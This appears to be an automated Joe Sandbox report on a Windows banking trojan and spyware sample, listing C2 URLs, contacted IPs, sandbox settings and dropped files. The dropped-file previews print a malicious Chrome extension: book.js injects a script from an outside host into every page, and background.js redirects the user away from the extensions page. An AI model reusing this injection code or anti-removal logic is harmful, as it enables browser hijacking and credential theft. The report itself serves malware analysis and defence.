                                                                                            http://C8DD8AE6DC4DC644.xyz/info_old/w63C4F3D9EA0CC861.exe, 00000003.00000003.364182783.0000000003EF0000.00000004.00000001.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://www.xunlei.com/download_engine.dll.3.drfalse
                                                                                              		high
                                                                                              http://pki.goog/gsr2/GTS1O1.crt0#ecvB803.tmp.11.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://aefd.nelreports.net/api/report?cat=bingthecvB803.tmp.11.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://upload.twitter.com/i/media/upload.json?command=APPEND&media_id=%s&segment_index=0accept:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/soap/envelope/download_engine.dll.3.drfalse
                                                                                                  		high
                                                                                                  https://exchangework%04d%02d%02d.xyz/http://changenewsys%04d%02d%02d.xyz/post_info.63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		low
                                                                                                  https://geolocation.onetrust.com/cookieconsentpub/v1/geo/locationecvB803.tmp.11.drfalse
                                                                                                    		high
                                                                                                    http://www.installshield.com/isetup/ProErrorCentral.asp?ErrorCode=%dfnhcdXEfus.exefalse
                                                                                                      		high
                                                                                                      https://assets.adobedtm.com/launch-EN7b3d710ac67a4a1195648458258f97dd.min.jsecvB803.tmp.11.drfalse
                                                                                                        		high
                                                                                                        https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCfd484f9188564713bbc5d13d862ebbfecvB803.tmp.11.drfalse
                                                                                                          		high
                                                                                                          https://curl.haxx.se/docs/http-cookies.html63C4F3D9EA0CC861.exe, 00000003.00000002.368731244.00000000034EF000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275181666.00000000033EF000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.openssl.org/support/faq.htmldownload_engine.dll.3.drfalse
                                                                                                              		high
                                                                                                              https://www.instagram.comsec-fetch-mode:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              https://www.instagram.com/accounts/login/ajax/facebook/63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96eecvB803.tmp.11.drfalse
                                                                                                                  		high
                                                                                                                  http://crl.thawte.com/ThawteTimestampingCA.crl0MiniThunderPlatform.exe.3.drfalse
                                                                                                                    		high
                                                                                                                    https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2ecvB803.tmp.11.drfalse
                                                                                                                      		high
                                                                                                                      https://www.instagram.com/sec-fetch-site:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://twitter.comReferer:63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://www.interestvideo.com/video1.php63C4F3D9EA0CC861.exe, 00000004.00000002.275181666.00000000033EF000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://www.instagram.com/accept:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://C8DD8AE6DC4DC644.xyz:80/info_old/r63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          https://www.messenger.com/login/nonce/63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://C8DD8AE6DC4DC644.xyz:80/info_old/w63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://www.youtube.com63C4F3D9EA0CC861.exefalse
                                                                                                                              		high
                                                                                                                              https://twitter.com/compose/tweetsec-fetch-dest:63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://crl.pki.goog/GTSGIAG3.crl0ecvB803.tmp.11.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtecvB803.tmp.11.drfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://1A469593C1FE15DC.xyz/63C4F3D9EA0CC861.exe, 00000003.00000003.364204277.0000000003947000.00000004.00000040.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                http://ocsp.thawte.com0MiniThunderPlatform.exe.3.drfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                		unknown
                                                                                                                                https://api.twitter.com/1.1/statuses/update.jsoninclude_profile_interstitial_type=1&include_blocking63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://store.paycenter.uc.cnmail-attachment.googleusercontent.comMiniThunderPlatform.exe.3.drfalse
                                                                                                                                    		high
                                                                                                                                    https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search63C4F3D9EA0CC861.exe, 00000003.00000003.284978493.000000000072F000.00000004.00000001.sdmp, Web Data1612045902911.3.drfalse
                                                                                                                                      		high
                                                                                                                                      https://twitter.com/63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_5QoHC_ilFOmb96M0pIeJecvB803.tmp.11.drfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        		unknown

                                                                                                                                        Contacted IPs

                                                                                                                                        • No. of IPs < 25%
                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                        • 75% < No. of IPs

                                                                                                                                        Public

                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                        34.94.64.66
                                                                                                                                        		unknownUnited States
                                                                                                                                        		15169GOOGLEUSfalse

                                                                                                                                        Private

                                                                                                                                        IP
                                                                                                                                        127.0.0.1

                                                                                                                                        General Information

                                                                                                                                        Joe Sandbox Version:31.0.0 Emerald
                                                                                                                                        Analysis ID:346325
                                                                                                                                        Start date:30.01.2021
                                                                                                                                        Start time:14:30:17
                                                                                                                                        Joe Sandbox Product:CloudBasic
                                                                                                                                        Overall analysis duration:0h 12m 36s
                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                        Report type:light
                                                                                                                                        Sample file name:fnhcdXEfus.exe
                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                        Run name:Run with higher sleep bypass
                                                                                                                                        Number of analysed new started processes analysed:40
                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                        Technologies:
                                                                                                                                        • HCA enabled
                                                                                                                                        • EGA enabled
                                                                                                                                        • HDC enabled
                                                                                                                                        • AMSI enabled
                                                                                                                                        Analysis Mode:default
                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                        Detection:MAL
                                                                                                                                        Classification:mal90.bank.troj.spyw.evad.winEXE@32/37@4/2
                                                                                                                                        EGA Information:Failed
                                                                                                                                        HDC Information:
                                                                                                                                        • Successful, ratio: 21.7% (good quality ratio 20.6%)
                                                                                                                                        • Quality average: 80.1%
                                                                                                                                        • Quality standard deviation: 27.4%
                                                                                                                                        HCA Information:
                                                                                                                                        • Successful, ratio: 67%
                                                                                                                                        • Number of executed functions: 0
                                                                                                                                        • Number of non-executed functions: 0
                                                                                                                                        Cookbook Comments:
                                                                                                                                        • Adjust boot time
                                                                                                                                        • Enable AMSI
                                                                                                                                        • Sleeps bigger than 120000ms are automatically reduced to 1000ms
                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                        Warnings:
                                                                                                                                        Show All
                                                                                                                                        • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                                                                                        • Excluded IPs from analysis (whitelisted): 52.147.198.201, 104.43.139.144, 51.11.168.160, 23.210.248.85, 92.122.213.194, 92.122.213.247, 2.20.142.209, 2.20.142.210, 20.54.26.129, 51.104.139.180, 52.155.217.156
                                                                                                                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net
                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                        • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                        Simulations

                                                                                                                                        Behavior and APIs

                                                                                                                                        No simulations

                                                                                                                                        Joe Sandbox View / Context

                                                                                                                                        IPs

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                        34.94.64.66fnhcdXEfus.exeGet hashmaliciousBrowse
                                                                                                                                        • C8DD8AE6DC4DC644.xyz/info_old/ddd

                                                                                                                                        Domains

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                        c8dd8ae6dc4dc644.xyzfnhcdXEfus.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.94.64.66

                                                                                                                                        ASN

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                        GOOGLEUSfnhcdXEfus.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.94.64.66
                                                                                                                                        KYC FORM01.xlsxGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        MediaPlayer.apkGet hashmaliciousBrowse
                                                                                                                                        • 172.217.20.106
                                                                                                                                        VM859-7757.htmGet hashmaliciousBrowse
                                                                                                                                        • 216.58.208.118
                                                                                                                                        KYC AGREEMENT.xlsxGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        INV.xlsxGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        ki7710921.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        0113 INV_PAK.xlsxGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        chrome.exeGet hashmaliciousBrowse
                                                                                                                                        • 8.8.8.8
                                                                                                                                        YK5tmqQ18z.exeGet hashmaliciousBrowse
                                                                                                                                        • 35.246.6.109
                                                                                                                                        q5oRsfy1vk.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        c8TrAKsz0T.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        Immuni.apkGet hashmaliciousBrowse
                                                                                                                                        • 172.217.20.106
                                                                                                                                        YWrrcqVAno.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        lbqFKoALqe.exeGet hashmaliciousBrowse
                                                                                                                                        • 35.184.90.176
                                                                                                                                        eDpjcIIh9G.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        6tivtkKtQx.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        Sf6jgQc6Ww.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        j64eIR1IEK.exeGet hashmaliciousBrowse
                                                                                                                                        • 34.102.136.180
                                                                                                                                        bEuBS6SwMo.exeGet hashmaliciousBrowse
                                                                                                                                        • 35.228.108.144

                                                                                                                                        JA3 Fingerprints

                                                                                                                                        No context

                                                                                                                                        Dropped Files

                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                        C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exefnhcdXEfus.exeGet hashmaliciousBrowse
                                                                                                                                          C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exefnhcdXEfus.exeGet hashmaliciousBrowse
                                                                                                                                            Cyfj6XGbkd.exeGet hashmaliciousBrowse
                                                                                                                                              N1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                                                Cyfj6XGbkd.exeGet hashmaliciousBrowse
                                                                                                                                                  N1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                                                    FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                                      FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                                        C:\Users\user\AppData\Local\Temp\MSI6DDB.tmp6MhmlD8KZh.exeGet hashmaliciousBrowse
                                                                                                                                                          fnhcdXEfus.exeGet hashmaliciousBrowse
                                                                                                                                                            Cyfj6XGbkd.exeGet hashmaliciousBrowse
                                                                                                                                                              N1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                                                                Cyfj6XGbkd.exeGet hashmaliciousBrowse
                                                                                                                                                                  N1yprTBBXs.exeGet hashmaliciousBrowse
                                                                                                                                                                    FileSetup-v17.04.41.exeGet hashmaliciousBrowse
                                                                                                                                                                      FileSetup-v17.04.41.exeGet hashmaliciousBrowse

                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                        C:\Users\user\AppData\Local\Cookies1612045889599
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.6970840431455908
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                                                        MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                                                        SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                                                        SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                                                        SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Cookies1612045902708
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                        Entropy (8bit):0.6970840431455908
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                                                                                                        MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                                                                                                        SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                                                                                                        SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                                                                                                        SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\background.js
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):886
                                                                                                                                                                        Entropy (8bit):5.022683940423506
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:sFfWxmARONJTW0/I8/lZ9OKMmA6eiH4MmDCvTV3u4:sYo/NJ/7Augi8Dy
                                                                                                                                                                        MD5:FEDACA056D174270824193D664E50A3F
                                                                                                                                                                        SHA1:58D0C6E4EC18AB761805AABB8D94F3C4CBE639F5
                                                                                                                                                                        SHA-256:8F538ED9E633D5C9EA3E8FB1354F58B3A5233F1506C9D3D01873C78E3EB88B8D
                                                                                                                                                                        SHA-512:2F1968EDE11B9510B43B842705E5DDAC4F85A9E2AA6AEE542BEC80600228FF5A5723246F77C526154EB9A00A87A5C7DDD634447A8F7A97D6DA33B94509731DBC
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: $(function() {..chrome.tabs.onSelectionChanged.addListener(function(tab,info){....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;....console.log(pageUrl);....if (Number(pageUrl.indexOf("extensions")) > 1) ....{....chrome.tabs.update({url:'https://chrome.google.com/webstore/category/extension'}); ....}. .... ...});.});....chrome.webRequest.onBeforeRequest.addListener(function(details) {....chrome.tabs.query({....active : true...}, function(tab) {....var pageUrl = tab[0].url;...});........var url = details.url;...}, {...urls : [ "<all_urls>" ]..}, [ "blocking" ]);...function sendMessageToContentScript(message, callback) {...chrome.tabs.query({....active : true,....currentWindow : true...}, function(tabs) {....chrome.tabs.sendMessage(tabs[0].id, message, function(response) {.....if (callback)......callback(response);....});...});..}...});
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\book.js
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):152
                                                                                                                                                                        Entropy (8bit):5.039480985438208
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:2LGffWpnYOJRyRmgO9lNCaVpveLWCfKVsSdDXaDQTNUHWSpHovJiRzlLBche:2LGXWpn7J8mgO9l3BeiCfLSdDYGNeW7u
                                                                                                                                                                        MD5:30CBBF4DF66B87924C75750240618648
                                                                                                                                                                        SHA1:64AF3DD53D6DED500863387E407F876C89A29B9A
                                                                                                                                                                        SHA-256:D35FBD13C27F0A01DC944584D05776BA7E6AD3B3D2CBDE1F7C349E94502127F5
                                                                                                                                                                        SHA-512:8117B8537A0B5F4BB3ED711D9F062E7A901A90FD3D2CF9DFFCC15D03ED4E001991BA2C79BCA072FA7FD7CE100F38370105D3CE76EB87F2877C0BF18B4D8CFBAB
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: (function(){.. var s = document.createElement('script'); .. s.src = '//kellyfight.com/22aff56f45f6b36dec.js'; .. document.body.appendChild(s);..})();
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\icon.png
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):1161
                                                                                                                                                                        Entropy (8bit):7.79271055262892
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24:2mEKEvFZonmDzTaC6EU1yPj0bhJKaurzF3LvLIeR2D+JGP6A8UJ0wrBI4ez:DExZomDXe1yPYHKNx3LvLvWFP6noFy4M
                                                                                                                                                                        MD5:5D207F5A21E55E47FCCD8EF947A023AE
                                                                                                                                                                        SHA1:3A80A7CF3A8C8F9BDCE89A04239A7E296A94160F
                                                                                                                                                                        SHA-256:4E8CE139D89A497ADB4C6F7D2FFC96B583DA1882578AB09D121A459C5AD8335F
                                                                                                                                                                        SHA-512:38436956D5414A2CF66085F290EF15681DBF449B453431F937A09BFE21577252565D0C9FA0ACEAAD158B099383E55B94C721E23132809DF728643504EFFCBE2B
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: .PNG........IHDR.............;0.....PIDATH..]..e....y....uw.u.>...D../..3$...".......J....H...(......0J...D...X,0?.v&Ww...9]<...;.:.Mt.w.............L.V..|z.Z_..b$...)...z.....|.\.?3Uw....^.{..xz..G.....`.Z_"!........x..L.G..H..=...o3.....?F.f'!6.W.~+@.`D.....g+......r].*..... .ob.8.M.jg.....X....L..P....A.D..Uo2.....\......w.y..`&...W..".XAE..V...<t.Y.,.@.......rb..R$..8@..(.. ...i..H.%R)`.h..1..43.jr.......p..pd.G"..8$..,.M..RL^.....u.....84u.......)8 NTH.#.....o0....2.....$27...e>..2.h._N..s.D...D..$.\....l:..7G.....(H..2...7f..g.i...(......O...M.Po..`.3.x.;....eO.Lr..).......XH.:....*...k..O.$....z7..U.a.H.IW.w..uU....o... u.....F1.q.Vf..S. .L...KF..*Mu5..\3p.l.6.{.Z..y#...J...B."...U..T...F.qv....F...u.]........@.QZzA..L...<........J.L$...2*.................0.0&]..;.of,..j.P.&.Yq..b.1!M..l...B.X.xp...4.h.....W.M.6.sPQG.v6........R....-@......z.b.zL.i..?......b...u|.;>...I....$..M..^:...wLTK...l.....=m.c...v...wz....a..5..}m......l
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\icon48.png
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2235
                                                                                                                                                                        Entropy (8bit):7.880518016071819
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:9V93V/3XpV1P2gnjz8xqNaT5YmiH+0Rn6r2ogpZGYmT2pN6esC+s5szuZNwG:BlFP7jzUTKm26rMCYmneWsCG
                                                                                                                                                                        MD5:E35B805293CCD4F74377E9959C35427D
                                                                                                                                                                        SHA1:9755C6F8BAB51BD40BD6A51D73BE2570605635D1
                                                                                                                                                                        SHA-256:2BF1D9879B36BE03B2F140FAD1932BC6AAAAAC834082C2CD9E98BE6773918CA0
                                                                                                                                                                        SHA-512:6C7D37378AA1E521E73980C431CE5815DEDB28D5B7003009B91392303D3BEC1EE6F2AAE719B766DA4209B607CD702FAE283E1682D3785EFF85E07D5EE81319C8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: .PNG........IHDR...0...0.....W.......IDATh..Z]l\G.......4."..8N..XB.....D#.< $. W..}....K...P.Q...........P..-xJT.O.*.!UBNjHl'..2..d.k......;........;s.3.o..........)B....D.D:.TH@...W...YB_...kw{&.{.[v;..ot.Zm..!j..PN.....i\. ...r..iU.O...f...........{...B* ..dh)...l.:|)`...'.......c.`.....,.Q.]f~BD@2s.{'V.d..{`IAFO...I......7..7.)j=...p.S..#..x.Ar@$.LQ......,@....\...M5.\.&e0.J...|....Z....h.]P.E.3T.]..4..$..)..J.._...c..g....L.....T.VR|y....Bd..y.k..x..m[q.7...I.S&..'..Rx~...R...y.n.7n.L.|..OZH.......YR.......9.....r....%H_`..n....Q.Q..a..wy} .EnL..r!W...M.%e.1`..i.El..N0_@..S....+.>=L....f...<....?_^[.....e2...@..d,w.....{.........s.......<.#...u<...tM]%K...}.c.......NLB.'.V)A.x.o..-..Y.0..o....L'zk$.$..Yvi..xP...........k..sB...z....\.L....k..l.47[8.?..../..0s..T..O....|E.@.Q."P.k.YNH;x....$.H<.....T...`........................'&.1...C...7.....z^.Xf..e}`...j.:.g.....>..Z{qcm..D.F.DyLK.@@..w,A.a.@.. ..sk.iZ"..d..+.M.....&N.y
                                                                                                                                                                        C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\emihechjjbnedinohcnpneeogfgehmce\1.0.0.0_0\jquery-1.8.3.min.js
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
                                                                                                                                                                        File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):93637
                                                                                                                                                                        Entropy (8bit):5.292996107428883
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:1536:96IzxETpavYSGaW4snuHEk/yosnSFngC/VEEG0vd0KO4emAp2LSEMBoviR+I1z5T:v+vIklosn/BLXjxzMhsSQ
                                                                                                                                                                        MD5:E1288116312E4728F98923C79B034B67
                                                                                                                                                                        SHA1:8B6BABFF47B8A9793F37036FD1B1A3AD41D38423
                                                                                                                                                                        SHA-256:BA6EDA7945AB8D7E57B34CC5A3DD292FA2E4C60A5CED79236ECF1A9E0F0C2D32
                                                                                                                                                                        SHA-512:BF28A9A446E50639A9592D7651F89511FC4E583E213F20A0DFF3A44E1A7D73CEEFDB6597DB121C7742BDE92410A27D83D92E2E86466858A19803E72A168E5656
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview: /*! jQuery v1.8.3 jquery.com | jquery.org/license */..(function(e,t){function _(e){var t=M[e]={};return v.each(e.split(y),function(e,n){t[n]=!0}),t}function H(e,n,r){if(r===t&&e.nodeType===1){var i="data-"+n.replace(P,"-$1").toLowerCase();r=e.getAttribute(i);if(typeof r=="string"){try{r=r==="true"?!0:r==="false"?!1:r==="null"?null:+r+""===r?+r:D.test(r)?v.parseJSON(r):r}catch(s){}v.data(e,n,r)}else r=t}return r}function B(e){var t;for(t in e){if(t==="data"&&v.isEmptyObject(e[t]))continue;if(t!=="toJSON")return!1}return!0}function et(){return!1}function tt(){return!0}function ut(e){return!e||!e.parentNode||e.parentNode.nodeType===11}function at(e,t){do e=e[t];while(e&&e.nodeType!==1);return e}function ft(e,t,n){t=t||0;if(v.isFunction(t))return v.grep(e,function(e,r){var i=!!t.call(e,r,e);return i===n});if(t.nodeType)return v.grep(e,function(e,r){return e===t===n});if(typeof t=="string"){var r=v.grep(e,function(e){return e.nodeType===1});if(it.test(t))return v.filter(t,r,!n);t=v.filter(t
